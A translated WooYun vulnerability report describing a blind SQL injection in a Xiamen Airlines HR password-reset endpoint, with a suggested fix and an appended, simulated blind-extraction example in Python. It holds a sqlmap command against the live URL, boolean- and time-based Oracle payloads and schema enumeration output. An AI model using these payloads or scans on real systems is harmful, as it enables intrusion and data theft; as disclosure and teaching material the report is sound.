
SQL injection in a Xiamen Airlines endpoint can leak main-site and shopping-mall data

2014-08-15 19:06

I had wanted to do a security test of Xiamen Airlines for a long time. Yesterday I had time, so I started. I began by collecting information from WooYun and from the domain names. Through http://wooyun.org/bugs/wooyun-2010-045840 I found Xiamen Air's first IP range, then scanned ports 80 and 8080 and found a DMZ login, a few Sangfor management pages and a Cisco firewall login page. I tried the Sangfor command-execution vulnerability without success, so I turned to the web side. In the end I settled on hr.xiamenair.com.cn. After registering a user I started testing everything, and after a while I came to a password-recovery function. I assumed there would be no SQL injection and was looking for a logic flaw; after clicking "retrieve password", the captured request was

http://hr.xiamenair.com.cn/ashx/Person/Password.ashx?action=PasswordReset&User_Login_Name=xxxxx&User_Name=xxxxxx

, an AJAX request. Never mind that. I can't stand not finding a bug, so I went ahead and checked for SQL injection; sqlmap confirmed one. I was so happy.

Proof of vulnerability:


5up3rc@vm-0:~$ sudo sqlmap -u "http://hr.xiamenair.com.cn/ashx/Person/Password.ashx?action=PasswordReset&User_Login_Name=xxx%40xxxx.com&User_Name=xxxxx" --tables --time-sec=2
[sudo] password for 5up3rc:

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:13:31

[09:13:31] [INFO] resuming back-end DBMS 'oracle'
[09:13:31] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: User_Name
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=PasswordReset&User_Login_Name=5up3rc@jdsec.com&User_Name=%E8%94%A1%E5%8B%87' AND 8520=8520 AND 'jhpF'='jhpF

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: action=PasswordReset&User_Login_Name=5up3rc@jdsec.com&User_Name=%E8%94%A1%E5%8B%87' AND 7689=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'nREw'='nREw
---
[09:13:33] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Oracle
[09:13:33] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[09:13:33] [INFO] fetching database (schema) names
[09:13:33] [INFO] fetching number of databases
[09:13:33] [INFO] resumed: 6
[09:13:33] [INFO] resumed: ETKT
[09:13:33] [INFO] resumed: HR_RECRUIT_ADM
[09:13:33] [INFO] resumed: SYS
[09:13:33] [INFO] resumed: SYSTEM
[09:13:33] [INFO] resumed: XHSHOPADM
[09:13:33] [INFO] resumed: XMAIR
[09:13:33] [INFO] fetching tables for databases: 'ETKT, HR_RECRUIT_ADM, SYS, SYSTEM, XHSHOPADM, XMAIR'
[09:13:33] [INFO] fetching number of tables for database 'HR_RECRUIT_ADM'
[09:13:33] [INFO] resumed: 30
[09:13:33] [INFO] resumed: JOBS_CODEDETAIL
[09:13:33] [INFO] resumed: JOBS_ELEME
[09:13:33] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:13:33] [INFO] retrieved: JOBS_FILES
[09:14:25] [INFO] retrieved: JOBS_FORUM_REPLY
[09:16:07] [INFO] retrieved: JOBS_FORUM_SECTION
[09:17:34] [INFO] retrieved: JOBS_FORUM_TOPIC
[09:18:38] [INFO] retrieved: JOBS_HTML
[09:19:26] [INFO] retrieved: JOBS_MESSAGE_INFO
[09:21:52] [INFO] retrieved: JOBS_MESSAGE_M
[09:22:26] [INFO] retrieved:
[09:22:36] [INFO] retrieved:



[Screenshot: QQ截图20140803180733.png]



It is a blind injection into Oracle. From the schema list above you can see that it reaches not only the HR database but also the shop schema and XMAIR, which I guess holds main-site data. Running a single injection took a whole afternoon, and my mailbox nearly collapsed... To keep my own information from leaking, I masked it in the output above. My writing is not good, so much of this is not very fluent; as long as it is understandable.

Fix:

Filter the User_Name parameter. More robustly, pass User_Name (and User_Login_Name) to the query as bind variables instead of concatenating them into the SQL string; filtering alone is easy to bypass, and the handler also accepts GET requests for a password reset, which should be a POST. Since the enumeration above reaches the ETKT, XHSHOPADM and XMAIR schemas, the database account used by the HR application should also be restricted to HR_RECRUIT_ADM.
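The report shows sqlmap's output but not how boolean-based blind extraction works, nor what the fix looks like in code. The following is an added example, not code from the report or from the Xiamen Airlines application: the report never shows the server side, so the handler here is a hypothetical reconstruction of the bug class (User_Name concatenated into the WHERE clause), SQLite stands in for Oracle (substr/unicode and sqlite_master replace Oracle's SUBSTR/ASCII and ALL_TABLES), and the table names and the test user are constructed. It walks the table names one character at a time through the same yes/no oracle and payload shape (`value' AND <condition> AND 'a'='a`) that the boolean-based payload on the page uses, then shows the same payload failing against a parameterized version of the handler.

```python
import sqlite3

# Constructed stand-in schema: SQLite plays the Oracle backend and
# sqlite_master plays ALL_TABLES.  Names only resemble the report's tables.
SCHEMA = """
CREATE TABLE JOBS_USER (login_name TEXT, user_name TEXT);
INSERT INTO JOBS_USER VALUES ('alice@example.com', 'Alice');
CREATE TABLE JOBS_FILES (id INTEGER);
CREATE TABLE JOBS_HTML (id INTEGER);
"""


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def password_reset_vulnerable(conn, login_name, user_name):
    """Hypothetical handler with the bug class the report describes:
    User_Name is concatenated into the SQL string.  True = 'reset ok'."""
    sql = ("SELECT COUNT(*) FROM JOBS_USER WHERE login_name = '%s' "
           "AND user_name = '%s'" % (login_name, user_name))
    return conn.execute(sql).fetchone()[0] > 0


def password_reset_fixed(conn, login_name, user_name):
    """Same handler with bind variables: quotes in the input are data, not SQL."""
    sql = "SELECT COUNT(*) FROM JOBS_USER WHERE login_name = ? AND user_name = ?"
    return conn.execute(sql, (login_name, user_name)).fetchone()[0] > 0


class BlindOracle:
    """Turns the endpoint into a yes/no oracle the way sqlmap's boolean-based
    blind technique does, with the payload shape from the report:
    <real value>' AND <condition> AND 'a'='a"""

    def __init__(self, conn, handler):
        self.conn, self.handler, self.requests = conn, handler, 0

    def ask(self, condition):
        self.requests += 1
        payload = "Alice' AND (%s) AND 'a'='a" % condition
        return self.handler(self.conn, "alice@example.com", payload)


def nth_table_char(index, pos):
    """Scalar subquery for the code point of character `pos` (1-based) of the
    `index`-th table name in sorted order; NULL once `pos` passes the end of
    the name or `index` passes the last table (Oracle: SUBSTR/ASCII on
    ALL_TABLES)."""
    return ("SELECT unicode(substr(name,%d,1)) FROM sqlite_master "
            "WHERE type='table' ORDER BY name LIMIT 1 OFFSET %d" % (pos, index))


def extract_table_name(oracle, index, max_len=64):
    """Recover one table name; ASCII names only (binary search over 1..127)."""
    name = ""
    for pos in range(1, max_len + 1):
        sub = nth_table_char(index, pos)
        if not oracle.ask("(%s) > 0" % sub):  # NULL > 0 is not true: end of name
            break
        lo, hi = 1, 127  # at most 7 requests per character
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask("(%s) > %d" % (sub, mid)):
                lo = mid + 1
            else:
                hi = mid
        name += chr(lo)
    return name


def dump_table_names(oracle, max_tables=64):
    names = []
    for index in range(max_tables):
        name = extract_table_name(oracle, index)
        if not name:
            break
        names.append(name)
    return names


if __name__ == "__main__":
    conn = build_db()
    oracle = BlindOracle(conn, password_reset_vulnerable)
    print(dump_table_names(oracle), "in", oracle.requests, "requests")
    # Against the parameterized handler the payload is just an unknown user name.
    print(BlindOracle(conn, password_reset_fixed).ask("1=1"))
```

Each recovered character costs one request to test for end-of-string plus seven for the binary search, which is why a single-threaded run over a 30-table schema takes as long as the timestamps in the output show; sqlmap's `--threads` option parallelizes exactly these requests. The time-based payload on the page is the same oracle with a different signal: the five-way self-join of ALL_USERS only runs when the injected condition is true, and the delay (compared against `--time-sec`) stands in for the boolean response.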


Source: www.wooyun.org/bugs/wooyun-2014-070871

Reads: 135319 | Comments: 0 | Tags: injection
